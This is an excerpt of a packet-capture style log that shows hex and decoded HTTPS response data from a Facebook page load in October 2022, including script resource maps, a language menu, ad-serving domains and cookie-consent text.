2022-10-07 13:59:00 UTC	400	IN	Data Raw: 2c 22 6e 63 22 3a 31 7d 2c 22 4d 30 4c 31 44 6f 61 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 63 51 74 34 5c 2f 79 6d 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 41 43 74 7a 4f 4d 6a 6b 72 62 6c 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 6a 6a 32 39 55 5a 42 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 64 5c 2f 72 5c 2f 30 4f 58 63 78 4b 6d 35 69 42 75 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c Data Ascii: ,"nc":1},"M0L1Doa":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3icQt4\/ym\/l\/en_US\/ACtzOMjkrbl.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"jj29UZB":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yd\/r\/0OXcxKm5iBu.js?_nc_x=Ij3Wp8l
2022-10-07 13:59:00 UTC	401	IN	Data Raw: 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 34 6c 72 34 5c 2f 79 74 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 53 76 5f 4c 73 46 45 65 52 47 38 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 78 32 32 4f 62 79 34 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 68 5c 2f 72 5c 2f 39 31 5a 56 4b 55 50 54 71 41 61 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 38 45 4c 43 42 77 48 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 Data Ascii: \/\/static.xx.fbcdn.net\/rsrc.php\/v3i4lr4\/yt\/l\/en_US\/Sv_LsFEeRG8.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"x22Oby4":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yh\/r\/91ZVKUPTqAa.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"8ELCBwH":{"type":"js","src":"h
2022-10-07 13:59:00 UTC	403	IN	Data Raw: 72 36 35 61 22 2c 22 4b 73 62 52 73 33 75 22 2c 22 78 32 6c 72 47 41 57 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 6c 57 4f 76 47 54 61 22 2c 22 42 49 79 6c 4b 43 34 22 2c 22 46 6e 33 72 41 6c 37 22 2c 22 52 50 4c 48 38 6a 67 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 57 65 62 53 70 65 65 64 49 6e 74 65 72 61 63 74 69 6f 6e 73 54 79 70 65 64 4c 6f 67 67 65 72 22 3a 7b 22 72 22 3a 5b 22 70 51 5c 2f 69 66 58 75 22 2c 22 38 7a 62 45 5a 74 75 22 2c 22 68 4b 59 30 51 4b 54 22 2c 22 42 49 79 6c 4b 43 34 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 41 73 79 6e 63 52 65 71 75 65 73 74 22 3a 7b 22 72 22 3a 5b 22 6e 36 57 34 78 4d 48 22 2c 22 38 7a 62 45 5a 74 75 22 2c Data Ascii: r65a","KsbRs3u","x2lrGAW","vGt2mxz","lWOvGTa","BIylKC4","Fn3rAl7","RPLH8jg"],"be":1},"WebSpeedInteractionsTypedLogger":{"r":["pQ\/ifXu","8zbEZtu","hKY0QKT","BIylKC4"],"rds":{"m":["BanzaiScuba_DEPRECATED"]},"be":1},"AsyncRequest":{"r":["n6W4xMH","8zbEZtu",
2022-10-07 13:59:00 UTC	404	IN	Data Raw: 5d 2c 22 62 65 22 3a 31 7d 2c 22 50 68 6f 74 6f 53 6e 6f 77 6c 69 66 74 22 3a 7b 22 72 22 3a 5b 22 62 4b 43 6c 54 67 56 22 2c 22 6c 47 30 6f 48 42 43 22 2c 22 62 39 4b 5a 49 48 4a 22 2c 22 71 31 6a 53 5a 38 63 22 2c 22 44 39 58 42 33 67 6a 22 2c 22 64 69 6f 67 56 61 75 22 2c 22 59 74 55 33 43 35 75 22 2c 22 68 49 77 41 32 57 36 22 2c 22 64 41 78 58 30 6a 6a 22 2c 22 6d 52 70 44 77 6d 64 22 2c 22 65 39 41 4e 7a 77 5c 2f 22 2c 22 53 79 48 76 61 66 68 22 2c 22 47 44 70 76 74 4b 33 22 2c 22 43 47 6b 48 34 46 59 22 2c 22 6a 31 76 63 68 56 64 22 2c 22 50 64 39 56 6a 78 6c 22 2c 22 43 51 57 57 67 50 76 22 2c 22 7a 4b 5c 2f 52 45 55 56 22 2c 22 34 33 66 32 4c 2b 36 22 2c 22 64 48 73 4a 51 36 79 22 2c 22 73 72 50 6d 64 74 34 22 2c 22 44 31 5c 2f 4a 54 6d 54 22 2c Data Ascii: ],"be":1},"PhotoSnowlift":{"r":["bKClTgV","lG0oHBC","b9KZIHJ","q1jSZ8c","D9XB3gj","diogVau","YtU3C5u","hIwA2W6","dAxX0jj","mRpDwmd","e9ANzw\/","SyHvafh","GDpvtK3","CGkH4FY","j1vchVd","Pd9Vjxl","CQWWgPv","zK\/REUV","43f2L+6","dHsJQ6y","srPmdt4","D1\/JTmT",
2022-10-07 13:59:00 UTC	406	IN	Data Raw: 48 6f 72 22 2c 22 78 32 6c 72 47 41 57 22 2c 22 6f 56 57 38 65 54 58 22 2c 22 6b 4f 45 48 76 70 75 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 36 59 65 33 48 37 45 22 2c 22 59 30 65 38 68 30 41 22 2c 22 6b 53 39 54 42 76 4f 22 2c 22 6c 57 4f 76 47 54 61 22 2c 22 6c 6c 34 5a 47 5c 2f 79 22 2c 22 4d 30 4c 31 44 6f 61 22 2c 22 68 33 5a 7a 41 6d 47 22 2c 22 4f 4a 30 33 31 65 37 22 2c 22 42 49 79 6c 4b 43 34 22 2c 22 6a 6a 32 39 55 5a 42 22 2c 22 6e 41 47 52 49 34 69 22 2c 22 4c 38 59 63 49 6f 6e 22 2c 22 65 50 65 34 5a 52 36 22 2c 22 63 59 55 33 63 33 32 22 2c 22 46 6e 33 72 41 6c 37 22 2c 22 73 46 44 4a 68 68 77 22 2c 22 52 50 4c 48 38 6a 67 22 2c 22 68 63 36 4d 59 58 55 22 2c 22 30 37 4a 53 69 50 30 22 2c 22 64 78 5c 2f 41 67 70 4f 22 5d 2c 22 72 64 73 22 3a 7b Data Ascii: Hor","x2lrGAW","oVW8eTX","kOEHvpu","vGt2mxz","6Ye3H7E","Y0e8h0A","kS9TBvO","lWOvGTa","ll4ZG\/y","M0L1Doa","h3ZzAmG","OJ031e7","BIylKC4","jj29UZB","nAGRI4i","L8YcIon","ePe4ZR6","cYU3c32","Fn3rAl7","sFDJhhw","RPLH8jg","hc6MYXU","07JSiP0","dx\/AgpO"],"rds":{
2022-10-07 13:59:00 UTC	407	IN	Data Raw: 2c 22 58 53 61 6c 65 73 50 72 6f 6d 6f 57 57 57 44 65 74 61 69 6c 73 44 69 61 6c 6f 67 41 73 79 6e 63 43 6f 6e 74 72 6f 6c 6c 65 72 22 3a 7b 22 72 22 3a 5b 22 67 57 4d 4a 67 54 65 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 58 4f 66 66 65 72 43 6f 6e 74 72 6f 6c 6c 65 72 22 3a 7b 22 72 22 3a 5b 22 68 49 65 6b 2b 62 47 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 50 65 72 66 58 53 68 61 72 65 64 46 69 65 6c 64 73 22 3a 7b 22 72 22 3a 5b 22 42 49 79 6c 4b 43 34 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 4f 44 53 22 3a 7b 22 72 22 3a 5b 22 38 7a 62 45 5a 74 75 22 2c 22 68 4b 59 30 51 4b 54 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 4b 65 79 45 76 65 6e 74 54 79 70 65 64 4c 6f 67 67 65 72 22 3a 7b 22 72 22 3a 5b 22 38 7a 62 45 5a 74 75 22 2c 22 68 4b 59 30 51 4b 54 22 2c 22 47 6a 38 76 39 Data Ascii: ,"XSalesPromoWWWDetailsDialogAsyncController":{"r":["gWMJgTe"],"be":1},"XOfferController":{"r":["hIek+bG"],"be":1},"PerfXSharedFields":{"r":["BIylKC4"],"be":1},"ODS":{"r":["8zbEZtu","hKY0QKT"],"be":1},"KeyEventTypedLogger":{"r":["8zbEZtu","hKY0QKT","Gj8v9
2022-10-07 13:59:00 UTC	409	IN	Data Raw: 67 70 4f 22 2c 22 52 50 4c 48 38 6a 67 22 2c 22 51 4d 6d 34 47 43 6d 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 43 6f 6e 74 65 78 74 75 61 6c 4c 61 79 65 72 49 6e 6c 69 6e 65 54 61 62 4f 72 64 65 72 22 3a 7b 22 72 22 3a 5b 22 5a 35 4c 46 32 6a 31 22 2c 22 7a 50 4c 67 49 47 54 22 2c 22 51 4d 6d 34 47 43 6d 22 2c 22 38 7a 62 45 5a 74 75 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 6c 57 4f 76 47 54 61 22 2c 22 42 49 79 6c 4b 43 34 22 2c 22 46 6e 33 72 41 6c 37 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 58 55 49 44 69 61 6c 6f 67 42 75 74 74 6f 6e 2e 72 65 61 63 74 22 3a 7b 22 72 22 3a 5b 22 59 74 55 33 43 35 75 22 2c 22 64 41 78 58 30 6a 6a 22 2c 22 7a 4b 5c 2f 52 45 55 56 22 2c 22 73 72 50 6d 64 74 34 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 49 61 52 5c 2f 36 75 50 22 2c 22 51 Data Ascii: gpO","RPLH8jg","QMm4GCm"],"be":1},"ContextualLayerInlineTabOrder":{"r":["Z5LF2j1","zPLgIGT","QMm4GCm","8zbEZtu","vGt2mxz","lWOvGTa","BIylKC4","Fn3rAl7"],"be":1},"XUIDialogButton.react":{"r":["YtU3C5u","dAxX0jj","zK\/REUV","srPmdt4","R5w1rCJ","IaR\/6uP","Q
2022-10-07 13:59:00 UTC	410	IN	Data Raw: 7d 7d 29 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 49 6e 69 74 69 61 6c 4a 53 4c 6f 61 64 65 72 22 5d 2c 20 66 75 6e 63 74 69 6f 6e 28 49 6e 69 74 69 61 6c 4a 53 4c 6f 61 64 65 72 29 20 7b 49 6e 69 74 69 61 6c 4a 53 4c 6f 61 64 65 72 2e 6c 6f 61 64 4f 6e 44 4f 4d 43 6f 6e 74 65 6e 74 52 65 61 64 79 28 5b 22 42 49 79 6c 4b 43 34 22 2c 22 38 7a 62 45 5a 74 75 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 68 4b 59 30 51 4b 54 22 2c 22 6d 52 70 44 77 6d 64 22 2c 22 6e 36 57 34 78 4d 48 22 2c 22 68 33 5a 7a 41 6d 47 22 2c 22 64 41 78 58 30 6a 6a 22 2c 22 63 59 55 33 63 33 32 22 2c 22 44 31 5c 2f 4a 54 6d 54 22 2c 22 5a 32 47 6a 56 75 39 22 2c 22 5c 2f 72 4f 30 6c 62 6e 22 2c 22 6c 57 4f 76 47 54 61 22 2c Data Ascii: }})});</script><script>requireLazy(["InitialJSLoader"], function(InitialJSLoader) {InitialJSLoader.loadOnDOMContentReady(["BIylKC4","8zbEZtu","vGt2mxz","hKY0QKT","mRpDwmd","n6W4xMH","h3ZzAmG","dAxX0jj","cYU3c32","D1\/JTmT","Z2GjVu9","\/rO0lbn","lWOvGTa",
2022-10-07 13:59:00 UTC	412	IN	Data Raw: 73 22 3a 5b 22 61 64 2e 64 6f 75 62 6c 65 63 6c 69 63 6b 2e 6e 65 74 22 2c 22 61 64 73 2d 65 6e 63 72 79 70 74 69 6f 6e 2d 75 72 6c 2d 65 78 61 6d 70 6c 65 2e 63 6f 6d 22 2c 22 62 73 2e 73 65 72 76 69 6e 67 2d 73 79 73 2e 63 6f 6d 22 2c 22 61 64 2e 61 74 64 6d 74 2e 63 6f 6d 22 2c 22 61 64 66 6f 72 6d 2e 6e 65 74 22 2c 22 61 64 31 33 2e 61 64 66 61 72 6d 31 2e 61 64 69 74 69 6f 6e 2e 63 6f 6d 22 2c 22 69 6c 6f 76 65 6d 79 66 72 65 65 64 6f 6d 73 2e 63 6f 6d 22 2c 22 73 65 63 75 72 65 2e 61 64 6e 78 73 2e 63 6f 6d 22 5d 2c 22 69 73 5f 6d 6f 62 69 6c 65 5f 64 65 76 69 63 65 22 3a 66 61 6c 73 65 7d 2c 32 37 5d 5d 2c 22 69 6e 73 74 61 6e 63 65 73 22 3a 5b 5b 22 5f 5f 69 6e 73 74 5f 30 32 31 38 32 30 31 35 5f 30 5f 30 5f 4f 67 22 2c 5b 22 53 65 6c 65 63 74 61 Data Ascii: s":["ad.doubleclick.net","ads-encryption-url-example.com","bs.serving-sys.com","ad.atdmt.com","adform.net","ad13.adfarm1.adition.com","ilovemyfreedoms.com","secure.adnxs.com"],"is_mobile_device":false},27]],"instances":[["__inst_02182015_0_0_Og",["Selecta
2022-10-07 13:59:00 UTC	413	IN	Data Raw: 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 31 5f 78 32 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 44 61 6e 73 6b 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 64 65 5f 44 45 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 32 5f 55 48 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 44 65 75 74 73 63 68 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 Data Ascii: :{"__m":"__markup_3310c079_0_1_x2"},"label":"Dansk","title":"","className":"headerItem"},{"class":"headerItem","value":"de_DE","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_2_UH"},"label":"Deutsch","title":"","c
2022-10-07 13:59:00 UTC	415	IN	Data Raw: 68 75 5f 48 55 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 39 5f 36 32 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 4d 61 67 79 61 72 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 6e 6c 5f 4e 4c 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 Data Ascii: hu_HU","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_9_62"},"label":"Magyar","title":"","className":"headerItem"},{"class":"headerItem","value":"nl_NL","selected":false,"ctor":{"__m":"MenuSelectableItem"},"marku
2022-10-07 13:59:00 UTC	416	IN	Data Raw: 75 6f 6d 69 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 73 76 5f 53 45 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 68 5f 33 52 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 53 76 65 6e 73 6b 61 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c Data Ascii: uomi","title":"","className":"headerItem"},{"class":"headerItem","value":"sv_SE","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_h_3R"},"label":"Svenska","title":"","className":"headerItem"},{"class":"headerItem",
2022-10-07 13:59:00 UTC	417	IN	Data Raw: 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 61 72 5f 41 52 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6f 5f 5c 2f 56 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 30 36 32 37 5c 75 30 36 34 34 5c 75 30 36 33 39 5c 75 30 36 33 31 5c 75 30 36 32 38 5c 75 30 36 34 61 5c 75 30 36 32 39 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 Data Ascii: m"},{"class":"headerItem","value":"ar_AR","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_o_\/V"},"label":"\u0627\u0644\u0639\u0631\u0628\u064a\u0629","title":"","className":"headerItem"},{"class":"headerItem","va
2022-10-07 13:59:00 UTC	419	IN	Data Raw: 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 6b 6f 5f 4b 52 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 76 5f 2b 54 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 64 35 35 63 5c 75 61 64 36 64 5c 75 63 35 62 34 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 5d 2c 7b 22 69 64 22 3a 22 75 5f 30 5f 36 5f 51 41 22 2c 22 62 65 68 61 76 69 6f 72 73 22 3a 5b 7b 22 5f 5f 6d 22 3a 22 58 55 49 4d 65 6e 75 57 69 74 68 53 71 Data Ascii: },{"class":"headerItem","value":"ko_KR","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_v_+T"},"label":"\ud55c\uad6d\uc5b4","title":"","className":"headerItem"}],{"id":"u_0_6_QA","behaviors":[{"__m":"XUIMenuWithSq
2022-10-07 13:59:00 UTC	420	IN	Data Raw: 5b 7b 22 5f 5f 6d 22 3a 22 43 6f 6e 74 65 78 74 75 61 6c 4c 61 79 65 72 41 75 74 6f 46 6c 69 70 22 7d 2c 7b 22 5f 5f 6d 22 3a 22 43 6f 6e 74 65 78 74 75 61 6c 44 69 61 6c 6f 67 41 72 72 6f 77 22 7d 2c 7b 22 5f 5f 6d 22 3a 22 43 6f 6e 74 65 78 74 75 61 6c 4c 61 79 65 72 50 6f 73 69 74 69 6f 6e 43 6c 61 73 73 4f 6e 43 6f 6e 74 65 78 74 22 7d 5d 2c 7b 22 61 6c 69 67 6e 68 22 3a 22 6c 65 66 74 22 2c 22 70 6f 73 69 74 69 6f 6e 22 3a 22 62 65 6c 6f 77 22 7d 5d 2c 32 5d 5d 2c 22 6d 61 72 6b 75 70 22 3a 5b 5b 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 75 58 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 34 2d 69 32 20 5f 70 69 67 20 5f 39 6f 2d 63 20 5f 39 70 Data Ascii: [{"__m":"ContextualLayerAutoFlip"},{"__m":"ContextualDialogArrow"},{"__m":"ContextualLayerPositionClassOnContext"}],{"alignh":"left","position":"below"}],2]],"markup":[["__markup_9f5fac15_0_0_uX",{"__html":"\u003Cdiv>\u003Cdiv class=\"_4-i2 _pig _9o-c _9p
2022-10-07 13:59:00 UTC	422	IN	Data Raw: 62 6f 6f 6b 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 32 5c 22 3e 5c 75 30 30 33 43 69 20 63 6c 61 73 73 3d 5c 22 69 6d 67 20 73 70 5f 32 6d 79 76 41 42 71 71 4b 71 71 20 73 78 5f 32 61 30 33 66 61 5c 22 3e 5c 75 30 30 33 43 5c 2f 69 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 34 5c 22 3e 50 72 6f 76 69 64 65 20 61 6e 64 20 69 6d 70 72 6f 76 65 20 46 61 63 65 62 6f 6f 6b 20 50 72 6f 64 75 63 74 73 20 66 6f 72 20 70 65 6f 70 6c 65 20 77 68 6f 20 68 61 76 65 20 61 6e 20 61 63 63 6f 75 6e 74 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 Data Ascii: book\u003C\/div>\u003C\/div>\u003Cdiv class=\"_9xo2\">\u003Ci class=\"img sp_2myvABqqKqq sx_2a03fa\">\u003C\/i>\u003Cdiv class=\"_9xo4\">Provide and improve Facebook Products for people who have an account\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv clas
2022-10-07 13:59:00 UTC	423	IN	Data Raw: 61 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 66 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6c 5c 22 3e 43 6f 6e 74 72 6f 6c 73 20 69 6e 20 79 6f 75 72 20 46 61 63 65 62 6f 6f 6b 20 61 63 63 6f 75 6e 74 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 73 70 61 6e 3e 5c 75 30 30 33 43 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 67 20 5f 39 76 37 76 5c 22 3e 5c 75 30 30 33 43 69 20 63 6c 61 73 73 3d 5c 22 69 6d 67 20 73 70 5f 32 6d 79 76 41 42 71 71 4b 71 71 20 73 78 5f 35 38 66 32 65 31 5c 22 3e 5c 75 30 30 33 43 5c 2f 69 3e 5c 75 30 30 33 43 5c 2f 73 70 61 6e 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 62 75 74 74 6f 6e 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 Data Ascii: an class=\"_9ngf\">\u003Cdiv class=\"_9o-l\">Controls in your Facebook account\u003C\/div>\u003C\/span>\u003Cspan class=\"_9ngg _9v7v\">\u003Ci class=\"img sp_2myvABqqKqq sx_58f2e1\">\u003C\/i>\u003C\/span>\u003C\/div>\u003C\/button>\u003Cdiv class=\"_9ng
2022-10-07 13:59:00 UTC	425	IN	Data Raw: 74 20 74 6f 20 73 68 6f 77 20 79 6f 75 20 61 64 73 2e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 73 69 2d 5c 22 3e 4f 66 66 2d 46 61 63 65 62 6f 6f 6b 20 61 63 74 69 76 69 74 79 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22 3e 59 6f 75 20 63 61 6e 20 72 65 76 69 65 77 20 79 6f 75 72 20 6f 66 66 2d 46 61 63 65 62 6f 6f 6b 20 61 63 74 69 76 69 74 79 2c 20 77 68 69 63 68 20 69 73 20 61 20 73 75 6d 6d 61 72 79 20 6f 66 20 61 63 74 69 76 69 74 79 20 74 68 61 74 20 62 75 73 69 6e 65 73 73 65 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 20 73 68 61 72 65 20 77 69 74 68 20 75 73 20 61 62 6f 75 74 20 79 6f 75 72 20 69 6e 74 65 72 61 63 74 69 6f 6e 73 20 77 69 Data Ascii: t to show you ads.\u003C\/p>\u003Cp class=\"_9si-\">Off-Facebook activity\u003C\/p>\u003Cp class=\"_9o-m\">You can review your off-Facebook activity, which is a summary of activity that businesses and organizations share with us about your interactions wi
2022-10-07 13:59:00 UTC	426	IN	Data Raw: 58 32 73 64 47 67 2d 34 4b 6b 53 35 30 35 76 49 56 69 71 6c 4a 58 4b 75 32 39 5a 62 52 41 64 70 76 4f 6b 63 77 71 67 4a 66 53 55 36 4e 52 62 43 73 4e 58 38 6d 4b 4e 37 32 45 42 68 62 53 37 77 4d 48 67 57 66 53 49 51 61 67 4b 56 4b 43 38 51 69 4d 4a 30 57 68 4d 43 5a 79 69 6d 5f 68 46 7a 49 4e 6f 66 44 68 71 64 70 4e 6b 51 32 71 6f 76 47 33 66 39 34 66 74 54 45 4f 38 56 30 61 6c 44 35 4c 67 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 68 6f 76 65 72 5c 22 3e 44 69 67 69 74 61 6c 20 41 64 76 65 72 74 69 73 69 6e 67 20 41 6c 6c 69 61 6e 63 65 5c 75 30 30 33 43 5c 2f 61 3e 20 69 6e 20 74 68 65 20 55 53 2c 20 74 68 65 20 5c 75 30 30 33 43 61 Data Ascii: X2sdGg-4KkS505vIViqlJXKu29ZbRAdpvOkcwqgJfSU6NRbCsNX8mKN72EBhbS7wMHgWfSIQagKVKC8QiMJ0WhMCZyim_hFzINofDhqdpNkQ2qovG3f94ftTEO8V0alD5Lg\" target=\"_blank\" rel=\"nofollow\" data-lynx-mode=\"hover\">Digital Advertising 